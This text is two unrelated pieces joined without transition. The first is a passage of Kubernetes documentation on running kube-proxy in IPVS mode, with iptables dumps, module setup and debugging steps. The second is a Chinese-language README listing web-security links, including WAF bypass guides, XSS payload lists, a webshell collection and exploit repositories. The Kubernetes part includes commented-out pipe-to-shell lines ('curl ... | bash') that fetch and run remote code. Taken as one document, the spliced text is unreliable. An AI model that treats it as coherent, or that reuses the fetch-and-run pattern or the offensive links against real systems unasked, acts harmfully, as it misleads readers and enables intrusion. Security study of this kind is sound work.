KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 Chain KUBE-MARK-DROP (0 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000 Chain KUBE-MARK-MASQ (6 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ tcp -- !10.244.16.0/24 10.244.5.1 /* default/foo:http cluster IP */ tcp dpt:8080 ``` **3. Load Balancer Source Ranges is specified for LB type service** When service's `LoadBalancerStatus.ingress.IP` is not empty and service's `LoadBalancerSourceRanges` is specified, ipvs proxier will install iptables which looks like what is shown below. Suppose service's `LoadBalancerStatus.ingress.IP` is `10.96.1.2` and service's `LoadBalancerSourceRanges` is `10.120.2.0/24`. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 Chain KUBE-MARK-DROP (0 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000 Chain KUBE-MARK-MASQ (6 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-SERVICES (2 references) target prot opt source destination ACCEPT tcp -- 10.120.2.0/24 10.96.1.2 /* default/foo:http loadbalancer IP */ tcp dpt:8080 DROP tcp -- 0.0.0.0/0 10.96.1.2 /* default/foo:http loadbalancer IP */ tcp dpt:8080 ``` **4. Support NodePort type service** For supporting NodePort type service, ipvs will recruit the existing implementation in iptables proxier. For example, ```shell # kubectl describe svc nginx-service Name: nginx-service ... Type: NodePort IP: 10.101.28.148 Port: http 3080/TCP NodePort: http 31604/TCP Endpoints: 172.17.0.2:80 Session Affinity: None # iptables -t nat -nL [root@100-106-179-225 ~]# iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ tcp -- !172.16.0.0/16 10.101.28.148 /* default/nginx-service:http cluster IP */ tcp dpt:3080 KUBE-SVC-6IM33IEVEEV7U3GP tcp -- 0.0.0.0/0 10.101.28.148 /* default/nginx-service:http cluster IP */ tcp dpt:3080 KUBE-NODEPORTS all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL Chain KUBE-NODEPORTS (1 references) target prot opt source destination KUBE-MARK-MASQ tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service:http */ tcp dpt:31604 KUBE-SVC-6IM33IEVEEV7U3GP tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service:http */ tcp dpt:31604 Chain KUBE-SVC-6IM33IEVEEV7U3GP (2 references) target prot opt source destination KUBE-SEP-Q3UCPZ54E6Q2R4UT all -- 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service:http */ Chain KUBE-SEP-Q3UCPZ54E6Q2R4UT (1 references) target prot opt source destination KUBE-MARK-MASQ all -- 172.17.0.2 0.0.0.0/0 /* default/nginx-service:http */ DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service:http */ tcp to:172.17.0.2:80 ``` ## Run kube-proxy in ipvs mode Currently, local-up scripts, GCE scripts and kubeadm support switching IPVS proxy mode via exporting environment variables or specifying flags. ### Prerequisite Ensure IPVS required kernel modules ```shell ip_vs ip_vs_rr ip_vs_wrr ip_vs_sh nf_conntrack_ipv4 ``` 1. have been compiled into the node kernel. Use `grep -e ipvs -e nf_conntrack_ipv4 /lib/modules/$(uname -r)/modules.builtin` and get results like the followings if compiled into kernel. ``` kernel/net/ipv4/netfilter/nf_conntrack_ipv4.ko kernel/net/netfilter/ipvs/ip_vs.ko kernel/net/netfilter/ipvs/ip_vs_rr.ko kernel/net/netfilter/ipvs/ip_vs_wrr.ko kernel/net/netfilter/ipvs/ip_vs_lc.ko kernel/net/netfilter/ipvs/ip_vs_wlc.ko kernel/net/netfilter/ipvs/ip_vs_fo.ko kernel/net/netfilter/ipvs/ip_vs_ovf.ko kernel/net/netfilter/ipvs/ip_vs_lblc.ko kernel/net/netfilter/ipvs/ip_vs_lblcr.ko kernel/net/netfilter/ipvs/ip_vs_dh.ko kernel/net/netfilter/ipvs/ip_vs_sh.ko kernel/net/netfilter/ipvs/ip_vs_sed.ko kernel/net/netfilter/ipvs/ip_vs_nq.ko kernel/net/netfilter/ipvs/ip_vs_ftp.ko ``` OR 2. have been loaded. ```shell # load module <module_name> modprobe -- ip_vs modprobe -- ip_vs_rr modprobe -- ip_vs_wrr modprobe -- ip_vs_sh modprobe -- nf_conntrack_ipv4 # to check loaded modules, use lsmod | grep -e ipvs -e nf_conntrack_ipv4 # or cut -f1 -d " " /proc/modules | grep -e ip_vs -e nf_conntrack_ipv4 ``` Packages such as `ipset` should also be installed on the node before using IPVS mode. Kube-proxy will fall back to IPTABLES mode if those requirements are not met. ### Local UP Cluster Kube-proxy will run in iptables mode by default in a [local-up cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md). To use IPVS mode, users should export the env `KUBE_PROXY_MODE=ipvs` to specify the ipvs mode before [starting the cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md#starting-the-cluster): ```shell # before running `hack/local-up-cluster.sh` export KUBE_PROXY_MODE=ipvs ``` ### GCE Cluster Similar to local-up cluster, kube-proxy in [clusters running on GCE](https://kubernetes.io/docs/getting-started-guides/gce/) run in iptables mode by default. Users need to export the env `KUBE_PROXY_MODE=ipvs` before [starting a cluster](https://kubernetes.io/docs/getting-started-guides/gce/#starting-a-cluster): ```shell #before running one of the commmands chosen to start a cluster: # curl -sS https://get.k8s.io | bash # wget -q -O - https://get.k8s.io | bash # cluster/kube-up.sh export KUBE_PROXY_MODE=ipvs ``` ### Cluster Created by Kubeadm Kube-proxy will run in iptables mode by default in a cluster deployed by [kubeadm](https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/). If you are using kubeadm with a [configuration file](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-init/#config-file), you can specify the ipvs mode adding `SupportIPVSProxyMode: true` below the `kubeProxy` field. ```json kind: MasterConfiguration apiVersion: kubeadm.k8s.io/v1alpha1 ... kubeProxy: config: featureGates: SupportIPVSProxyMode=true mode: ipvs ... ``` before running `kube init --config <path_to_configuration_file>` If you are using Kubernetes v1.8, you can also add the flag `--feature-gates=SupportIPVSProxyMode=true` (deprecated since v1.9) in `kubeadm init` command ``` kubeadm init --feature-gates=SupportIPVSProxyMode=true ``` to specify the ipvs mode before deploying the cluster. **Notes** If ipvs mode is successfully on, you should see ipvs proxy rules (use `ipvsadm`) like ```shell # ipvsadm -ln IP Virtual Server version 1.2.1 (size=4096) Prot LocalAddress:Port Scheduler Flags -> RemoteAddress:Port Forward Weight ActiveConn InActConn TCP 10.0.0.1:443 rr persistent 10800 -> 192.168.0.1:6443 Masq 1 1 0 ``` or similar logs occur in kube-proxy logs (for example, `/tmp/kube-proxy.log` for local-up cluster) when the local cluster is running: ``` Using ipvs Proxier. ``` While there is no ipvs proxy rules or the following logs ocuurs indicate that the kube-proxy fails to use ipvs mode: ``` Can't use ipvs proxier, trying iptables proxier Using iptables Proxier. ``` See the following section for more details on debugging. ## Debug ### Check IPVS proxy rules Users can use `ipvsadm` tool to check whether kube-proxy are maintaining IPVS rules correctly. For example, we have the following services in the cluster: ``` # kubectl get svc --all-namespaces NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE default kubernetes ClusterIP 10.0.0.1 <none> 443/TCP 1d kube-system kube-dns ClusterIP 10.0.0.10 <none> 53/UDP,53/TCP 1d ``` We may get IPVS proxy rules like: ```shell # ipvsadm -ln IP Virtual Server version 1.2.1 (size=4096) Prot LocalAddress:Port Scheduler Flags -> RemoteAddress:Port Forward Weight ActiveConn InActConn TCP 10.0.0.1:443 rr persistent 10800 -> 192.168.0.1:6443 Masq 1 1 0 TCP 10.0.0.10:53 rr -> 172.17.0.2:53 Masq 1 0 0 UDP 10.0.0.10:53 rr -> 172.17.0.2:53 Masq 1 0 0 ``` ### Why kube-proxy can't start IPVS mode Use the following check list to help you solve the problems: **1. Enable IPVS feature gateway** For Kubernetes v1.10 and later, feature gate `SupportIPVSProxyMode` is set to `true` by default. However, you need to enable `--feature-gates=SupportIPVSProxyMode=true` explicitly for Kubernetes before v1.10. **2. Specify proxy-mode=ipvs** Check whether the kube-proxy mode has been set to `ipvs`. **3. Install required kernel modules and packages** Check whether the ipvs required kernel modules have been compiled into the kernel and packages installed. (see Prerequisite)
# [Web-Security-Note](https://github.com/Smi1e521/Web-Security-Note) Record some common Web security sites 由于平常读过的文章以及遇到的比较好的开源项目都被渐渐遗忘了,所以利用这个项目来记录一下,以便查阅。 # 目录: - [CTF](#CTF) - [Online-Tools](#Online-Tools) - [漏洞环境](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83) - [信息搜集](#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86) - [工具](#%E5%B7%A5%E5%85%B7) - [面经](#%E9%9D%A2%E7%BB%8F) - [BypassWAF](#BypassWAF) - [WEB安全](#WEB%E5%AE%89%E5%85%A8) - [漏洞挖掘](#%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98) - [渗透测试](#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95) - [内网渗透](#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F) - [扫描器开发](#%E6%89%AB%E6%8F%8F%E5%99%A8%E5%BC%80%E5%8F%91) - [开发](#%E5%BC%80%E5%8F%91) - [运维](#%E8%BF%90%E7%BB%B4) # CTF + [CTF Time](https://ctftime.org/) + [Pwnhub](https://pwnhub.cn/) + [CTF_论剑场](http://new.bugku.com/) + [南京邮电大学CTF平台](https://cgctf.nuptsast.com/) + [Whale CTF](http://whalectf.xin/) + [JarvisOJ](https://www.jarvisoj.com/) + [Hackme CTF](https://hackme.inndy.tw/) + [X计划平台](https://www.linkedbyx.com/) + [id0-rsa](https://id0-rsa.pub/) + [solveme](http://solveme.peng.kr/) + [ctfhub](https://github.com/ByPupil/ctfhub/tree/master/php_characteristics) + [CTF_WEB](https://github.com/wonderkun/CTF_web) + [Web-CTF-Cheatsheet](https://github.com/w181496/Web-CTF-Cheatsheet) + [PHP_Code_Challenge](https://github.com/yaofeifly/PHP_Code_Challenge) + [CTFTraining](https://github.com/CTFTraining) + [为应对CTF比赛而搭建的各种环境](https://github.com/wonderkun/CTFENV) # Online-Tools + [XSS'OR](http://xssor.io/) + [YoungxjTools](http://tools.yum6.cn/) + [CEYE](http://ceye.io/) + [Linux命令搜索](https://wangchujiang.com/linux-command/) + [正则表达式在线测试](https://c.runoob.com/front-end/854) + [CEYE](http://ceye.io/) + [One-lined Python](http://www.onelinerizer.com/) + [carbon代码美化](https://carbon.now.sh/) + [Online regex test and debug](https://regex101.com/) + [PHP Sandbox](http://sandbox.onlinephpfunctions.com/) + [CODELF-给程序变量起名](https://unbug.github.io/codelf/) + [几秒内获得一个干净的Linux系统](https://github.com/instantbox/instantbox) # 漏洞环境 + [Vulhub](https://vulhub.org/) + [Vulnhub](https://www.vulnhub.com/) + [VulApps](http://vulapps.evalbug.com/) + [VULNSPY](https://www.vulnspy.com/) + [XSS Thousand Knocks](https://knock.xss.moe/) + [upload-labs](https://github.com/c0ny1/upload-labs) + [HackTheBox](https://www.hackthebox.eu/) + [AttackDefense](https://attackdefense.com/) + [Weblogic环境搭建工具](https://github.com/QAX-A-Team/WeblogicEnvironment) # 信息搜集 + [被动信息收集(上)](https://mp.weixin.qq.com/s?__biz=MzUyMzQzOTMwMQ==&mid=2247485824&idx=1&sn=8e1b6b73fde8117410c2ff6e10531a53&chksm=fa3dd42acd4a5d3cfb83795dcf74afe5c7b66ca588976c9048fc1d9ed320271a15d7cefc595e&mpshare=1&scene=23&srcid=1026WJ7g8j0JCi5kvVPZ9Ahz#rd) + [被动信息收集(下)](https://mp.weixin.qq.com/s?__biz=MzUyMzQzOTMwMQ==&mid=2247485845&idx=1&sn=a8cbda7f3e0b1e52a594dbfb924e5f29&chksm=fa3dd43fcd4a5d290f6816a9df0854e0c95f4e678b67c84e35ccfca09a8636d92aaff2ecfef3&mpshare=1&scene=23&srcid=1026QbUKhXA2SKFQB5g0LeYP#rd) + [渗透测试标准-情报收集(上)](https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484029&idx=1&sn=64fe6b9d7e50b044735a8e56131ed363&chksm=fa177ebecd60f7a808e9fddf7227d67e33904f09563e251694a92b693ca8b00c17674b9cf1a8&mpshare=1&scene=23&srcid=%23rd) + [渗透测试标准-情报收集(中)](https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484034&idx=1&sn=575e356a6fccb22e4cc7c3d612d71879&chksm=fa177e41cd60f757a3ac88f2e039b9c592e7a311b90b112204f4bd9befe1c8288b24673b6cca&mpshare=1&scene=23&srcid=%23rd) + [子域名在线搜索](http://tool.chinaz.com/subdomain) + [temmo](https://github.com/bit4woo/teemo) + [快速提取C段:cscan](https://github.com/lufeirider/cscan) + [Async DNS Brute](https://github.com/blark/aiodnsbrute/) + [【渗透神器系列】搜索引擎](https://thief.one/2017/05/19/1/) + [浅谈信息收集的那些事儿](https://xz.aliyun.com/t/5012#toc-9) + [浅谈信息收集](https://mp.weixin.qq.com/s?srcid=&scene=22&sharer_sharetime=1573375803204&mid=2247484128&sharer_shareid=53ce26ebcfc0ab407e8f37bf3cb55ec8&sn=1640c02c03b621eb224de15071ca4e38&idx=1&__biz=MzU4OTExNTk0OA%253D%253D&chksm=fdd325a3caa4acb5e6090cb826873be902d1333c6f7820699080f92541a108c7b6c12da1b222&mpshare=1%23rd) + [信息搜集](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247485587&idx=1&sn=2fdc7f93038ddb3d5fa906a2834ffdeb&chksm=fc3fb192cb4838840e3d1b7daa495ee4e6c4ba7ccb6ba27a14044489f8cf90018f9a17423a4e&mpshare=1&scene=23&srcid&sharer_sharetime=1576459880818&sharer_shareid=a3b3f154db92e8d09cdde92bdb778322%23rd) # 工具 + [Scanners-Box](https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md) + [waf自动爆破(绕过)工具](https://github.com/3xp10it/bypass_waf) + [K8工具(内网渗透/提权工具/远程溢出/漏洞利用/Exploit/APT/0day/Shellcode/Payload/priviledge/OverFlow/WebShell/PenTest)](https://github.com/k8gege/K8tools) + [k8工具使用教程](https://mp.weixin.qq.com/s/Io7YvMLEk_wcmTji36PTZw) + [内网渗透必备工具](https://github.com/yuxiaokui/Intranet-Penetration) + [XSStrike](https://github.com/s0md3v/XSStrike) + [自动扫描内网常见sql、no-sql数据库脚本:DBScanner](https://github.com/se55i0n/DBScanner) + [waf指纹识别](https://github.com/EnableSecurity/wafw00f) + [goproxy高性能代理工具](https://github.com/snail007/goproxy/blob/master/README_ZH.md#%E9%A6%96%E6%AC%A1%E4%BD%BF%E7%94%A8%E5%BF%85%E7%9C%8B-1) + [轻量级渗透测试辅助框架:WebPocket](https://github.com/TuuuNya/WebPocket) + [CVE-2018-8120 Windows LPE exploit](https://github.com/unamer/CVE-2018-8120) + [Github信息搜集工具](https://github.com/repoog/GitPrey) + [v2ray mac科学上网客户端](https://github.com/yanue/V2rayU) + [hack-requests](https://github.com/boy-hack/hack-requests) + [Github内容高级挖掘工具](https://github.com/UnkL4b/GitMiner) + [【渗透神器系列】Metasploit](https://thief.one/2017/08/01/1/) + [Metasploit5命令快速查询表](https://mp.weixin.qq.com/s/X84V-OGNzfXTWoXly3xDhA) + [CMS漏洞测试用例集合](https://github.com/SecWiki/CMS-Hunter) + [proxypool](https://github.com/henson/proxypool) + [sublert子域名监控](https://xz.aliyun.com/t/4532) + [kunpeng](https://github.com/opensec-cn/kunpeng) + [模拟登录一些知名的网站,为了方便爬取需要登录的网站](https://github.com/echohun/fuck-login) + [webshell收集项目](https://github.com/tennc/webshell) + [打造自己的渗透测试框架 — 溯光](https://bithack.io/forum/232?from=timeline&isappinstalled=0) + [jsEncrypter 加密传输爆破的Burp Suite插件](https://github.com/c0ny1/jsEncrypter) + [内网穿透代理服务器 nps](https://github.com/cnlh/nps) # 面经 + [Pentest_Interview](https://github.com/Leezj9671/Pentest_Interview) + [信息安全实习和校招的面经、真题和资料](https://github.com/SecYouth/sec-jobs) + [一套实用的渗透测试岗位面试题](https://mp.weixin.qq.com/s?__biz=MzIxMjEwNTc4NA==&mid=2652988672&idx=1&sn=96a3639c33f9506709c23f274a71b2b6&chksm=8c9eea57bbe9634179aff1eaad8d7257532b5abb52fb5c3b5bfb0fb24725065ed517ca14d821&mpshare=1&scene=23&srcid=%23rd) + [大型公司安全技术岗位面试杂谈](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247489580&idx=1&sn=dc04f15e96becf922b9f66beb4562dad&chksm=ec1e2804db69a112e056b4c70ac0ac72a0d9f77b269532afe05a534b4e34691a66fe273c31bd&mpshare=1&scene=23&srcid=%23rd) + [面试「计算机操作系统」知识点大集合!](https://mp.weixin.qq.com/s?__biz=MzI4MDEwNzAzNg==&mid=2649445419&idx=1&sn=ea3cb5add4b48a3d86294254aa032170&chksm=f3a27558c4d5fc4e6fbf1a605ffe953f60bb4efffc310708f1dee71ad43981c6b0cd78ba8363&mpshare=1&scene=23&srcid=%23rd) + [网络信息安全从业者面试指南](https://github.com/FeeiCN/SecurityInterviewQuestions) + [安全面试经验收集](https://attacker.cc/index.php/archives/24/) + [PHP面试问答](https://github.com/colinlet/PHP-Interview-QA) + [最新BAT面试题](https://github.com/lengyue1024/BAT_interviews) + [信息安全面试题汇总](https://github.com/Dollarsss/sec-interview) + [技术面试最后反问面试官的话](https://github.com/yifeikong/reverse-interview-zh) + [知道创宇面试笔记](https://wulidecade.cn/2019/08/30/%E7%9F%A5%E9%81%93%E5%88%9B%E5%AE%87%E9%9D%A2%E8%AF%95%E7%AC%94%E8%AE%B0/) + [简历常用例句](https://github.com/resumejob/awesome-resume) + [web-sec-interview](https://github.com/zhaoweiho/web-sec-interview/blob/master/README_CN.md) # BypassWAF + [WAF攻防研究之四个层次Bypass WAF](https://xz.aliyun.com/t/15) + [Web应用程序防火墙(WAF)绕过技术(一)](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) + [Web应用程序防火墙(WAF)绕过技术(二)](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) + [Web应用程序防火墙(WAF)绕过技术(三)](https://www.secjuice.com/web-application-firewall-waf-evasion/) + [Web应用程序防火墙(WAF)绕过技术(四)](https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/) + [看我如何通过DNS历史记录绕过防火墙](https://mp.weixin.qq.com/s?srcid=02225HSVRBNh4QPJeorGny8D&scene=23&mid=2247487603&sn=278633c3b4d712e1839e6b8c6fa5e2c6&idx=1&__biz=MzIxNjQ0MTEwMg%253D%253D&chksm=97885812a0ffd1046f6b10aaa79de9471e6ad4b62e3b4ef659cef38f705a197c399b9b37b9a6&mpshare=1%23rd) + [识别 WAF 的方法](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247489463&idx=1&sn=568e1e4e1cac56dded7c3ac6d310a72d&chksm=ec1e279fdb69ae89fa171b66cc272622e254f282c80aef2a141c26879166a9b0fb2efd7e2ac9&mpshare=1&scene=23&srcid=%23rd) + [技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + [利用分块传输吊打所有WAF](https://www.anquanke.com/post/id/169738) + [XXE Bypass WAF](https://www.anquanke.com/post/id/170655) + [Bypass XSS Detection WAF](https://medium.com/@th3law/fun-bypass-xss-detection-waf-cabd431e030e) + [对过WAF的一些认知](https://www.anquanke.com/post/id/177044) + [我的WafBypass之道(SQL注入篇)](https://xz.aliyun.com/t/368) + [我的WafBypass之道(Upload篇)](https://xz.aliyun.com/t/337) + [利用PHP的字符串解析特性Bypass](https://www.freebuf.com/articles/web/213359.html) + [Bypass MySQL Safedog](https://www.anquanke.com/post/id/188465) + [Waf从入门到Bypass](https://forum.90sec.com/t/topic/532) # WEB安全 ## XSS + [Web安全从零开始-XSS I](https://blog.zeddyu.info/2019/03/13/Web%E5%AE%89%E5%85%A8%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B-XSS-I/#Encode) + [XSS漏洞挖掘-进阶](http://blog.b1ok3n.cn/2019/09/11/XSS%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98-%E8%BF%9B%E9%98%B6/) + [XSS Payloads](http://www.xss-payloads.com/index.html) + [XSS payload](https://github.com/s0md3v/AwesomeXSS) + [Orange: A Wormable XSS on HackMD!](http://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html) + [测试WAF来学习XSS姿势](https://www.anquanke.com/post/id/176185) + [无需括号与分号的XSS](https://www.anquanke.com/post/id/178610) + [JS变异小技巧:使用JavaScript全局变量绕过XSS过滤器](https://zhuanlan.zhihu.com/p/75785844) + [XSS Challenge Wiki](https://github.com/cure53/xss-challenge-wiki/wiki) ## CSP + [前端防御从入门到弃坑--CSP变迁](https://paper.seebug.org/423/) + [CSP绕过思路及总结](https://xz.aliyun.com/t/5084) + [CSP Level 3浅析&简单的bypass](https://lorexxar.cn/2016/08/08/ccsp/) + [CSP绕过总结](https://hurricane618.me/2018/06/30/csp-bypass-summary/) + [通过浏览器缓存来bypass CSP script nonce](https://lorexxar.cn/2017/05/16/nonce-bypass-script/) + [那些年我们绕过的CSP](http://heartsky.info/2017/03/03/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E7%BB%95%E8%BF%87%E7%9A%84CSP/) ## SSRF + [SSRF 从入门到批量找漏洞](https://mp.weixin.qq.com/s?srcid=&scene=23&mid=2247489585&sn=fcef498cdd1a348e9f02b5861d59b15a&idx=1&__biz=MzI5MDQ2NjExOQ%253D%253D&chksm=ec1e2819db69a10f71e8bd5b342628381c2537549e59f3b1690527e465e417b6bc1be865ea9d&mpshare=1%23rd) + [利用SVG图片和SSRF收集服务器内部信息](https://nosec.org/home/detail/2305.html) + [SSRF绕过姿势汇总](https://github.com/cujanovic/SSRF-Testing) + [IPv6 三个访问本地地址的小Tips](https://www.tttang.com/archive/1293/) ## Sql注入 + [PDO场景下的SQL注入探究](https://xz.aliyun.com/t/3950) + [为什么参数化查询可以防止SQL注入?](https://www.waitalone.cn/sql-preparestatement.html) + [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973) + [浅析白盒审计中的字符编码及SQL注入](https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html#1452) + [phpMyAdmin后台GetShell实战应用](https://mp.weixin.qq.com/s?srcid=&scene=23&mid=2649086937&sn=9e0971883d628ed71419ad5109500eb5&idx=1&__biz=MzI1MDA4MTgwMw%253D%253D&chksm=f196dcbdc6e155ab5f4fcb60166bc2182b99a93aec898d98cb4ea7df72f285ffa1116632be64&mpshare=1%23rd) + [MYSQL_SQL_BYPASS_WIKI](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI?from=groupmessage&isappinstalled=0) + [oracle无SELEC注入](http://www.yulegeyu.com/2019/11/24/ORACLE-%E6%97%A0SELEC%E6%B3%A8%E5%85%A5/) ## XXE + [一篇文章带你深入理解漏洞之 XXE 漏洞](https://xz.aliyun.com/t/3357) ## 命令执行 + [命令注入新玩法:巧借环境渗透测试目标](https://www.freebuf.com/articles/web/194574.html) + [浅谈几种Bypass disable_functions的方法](https://www.mi1k7ea.com/2019/06/02/浅谈几种Bypass-disable-functions的方法/) ## 上传 + [绕过GD库渲染的WEBSHELL生成器](https://wiki.ioin.in/soft/detail/1q) + [Exploiting PHP-GD imagecreatefromjpeg() function](https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg) + [构造优质上传漏洞fuzz字典](http://gv7.me/articles/2018/make-upload-vul-fuzz-dic/) + [.user.ini文件构成的PHP后门 – phith0n](http://www.vuln.cn/6001) ## CSRF + [CSRF 原理与防御案例分析](https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247489737&idx=1&sn=db25ccea70cbf6d80126f637109226b4&chksm=ec1e28e1db69a1f7c3f889dc65deb8aa7b6a89d51b30194147388f21e8111ba2cad93cbafb6e&mpshare=1&scene=23&srcid=%23rd) + [Bypass SameSite Cookies Default to Lax and get CSRF](https://medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b) ## 同源策略 + [跨域方式及其产生的安全问题](https://xz.aliyun.com/t/4470) + [cors安全部署最佳实践](https://www.jianjunchen.com/post/cors%E5%AE%89%E5%85%A8%E9%83%A8%E7%BD%B2%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5/) + [再谈同源策略](https://lightless.me/archives/review-SOP.html) + [九种跨域方式实现原理](https://mp.weixin.qq.com/s?__biz=MzA3NTUzNjk1OA==&mid=2651562096&idx=2&sn=e13a8cd585f09ccc4acf90d4863636a5&chksm=84900f21b3e78637b81795f600e325cba6dcf5f97cd7c194584b751c0775067b2ee3f099337b&mpshare=1&scene=23&srcid=%23rd) ## 文件包含 + [php文件包含漏洞](https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/) ## 缓存投毒 + [实战Web缓存投毒(上)](https://www.anquanke.com/post/id/156356) + [实战Web缓存投毒(下)](https://www.anquanke.com/post/id/156551) ## 提权 + [Windows下三种mysql提权剖析](https://xz.aliyun.com/t/2719) + [mysql数据库提权总结](https://uuzdaisuki.com/2018/07/02/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/) + [MySQL UDF Exploitation](https://osandamalith.com/2018/02/11/mysql-udf-exploitation/) ## 反序列化 + [Phar与Stream Wrapper造成PHP RCE的深入挖掘](https://xz.aliyun.com/t/2958) ## 代码审计 + [NAVEX->Precise and Scalable Exploit Generation for Dynamic Web Applications](http://zeroyu.xyz/2019/03/11/NAVEX-Precise-and-Scalable-Exploit-Generation-for-Dynamic-Web-Applications/) + [PHP内核层解析反序列化漏洞](https://mp.weixin.qq.com/s/RL8_kDoHcZoED1G_BBxlWw) + [如何阅读一份源代码?](https://www.codedump.info/post/20190324-how-to-read-code/) + [Audit-Learning](https://github.com/jiangsir404/Audit-Learning) + [php_bugs](https://github.com/bowu678/php_bugs) + [从一道题讲PHP复杂变量](https://xz.aliyun.com/t/4785) + [文件变化实时监控工具](https://github.com/TheKingOfDuck/FileMonitor) + [Thinkphp 源码阅读](https://www.chabug.org/audit/1102.html) + [Thinkphp5 RCE总结](https://www.chabug.org/audit/1078.html) ## 解析漏洞 + [Web中间件常见漏洞总结](https://www.t00ls.net/thread-51654-1-1.html) + [widows系统文件命名规则的特殊利用](https://mp.weixin.qq.com/s/On4yLlCHK20LBzAEEd5h_Q) + [IIS短文件名泄露漏洞](https://paper.tuisec.win/detail/70b173f0ab9a4fe) + [深入探究:反向代理的攻击面 (上)](https://xz.aliyun.com/t/4577) + [深入探究:反向代理的攻击面 (下)](https://xz.aliyun.com/t/4644) + [中间件漏洞合集](https://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374608&idx=1&sn=9dc025a8bbc372c0819a7f99f253ad1b&chksm=beb0826c89c70b7ab18819390d9d21bc1ce21ba6a0ab3bc80198d53f01d73802732a967c4289&mpshare=1&scene=23&srcid=%23rd) + [CMS、中间件漏洞检测利用合集](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection) ## PHP + [PHP7和PHP5在安全上的区别](https://www.freebuf.com/articles/web/197013.html) + [PHP 7 的几处函数安全小变化](https://www.xmsec.cc/few-security-changes-between-php-7-and-php-5/) + [PHP 连接方式介绍以及如何攻击 PHP-FPM](https://mp.weixin.qq.com/s/z2JVc9kUkmRl9bDaEbkTFg) + [PHP 邮件漏洞小结](https://mp.weixin.qq.com/s?__biz=MzU1MzE3Njg2Mw==&mid=2247486554&idx=1&sn=bfcce52abfdb5b18155958460b68c550&chksm=fbf7962acc801f3cbbcb4ba10a345a22dcc3af556589d7b03c9c9350beae45133e21e543acb3&mpshare=1&scene=23&srcid=%23rd) + [详细解析PHP mail()函数漏洞利用技巧](https://www.anquanke.com/post/id/86028) + [PHP Webshell下绕过disable_function的方法](https://xz.aliyun.com/t/5320) + [RCE with strict disable_functions](https://github.com/w181496/FuckFastcgi) + [玩转php的编译与执行](https://www.secpulse.com/archives/108771.html) + [PHP安全SDK及编码规范](https://github.com/momosecurity/rhizobia_P) + 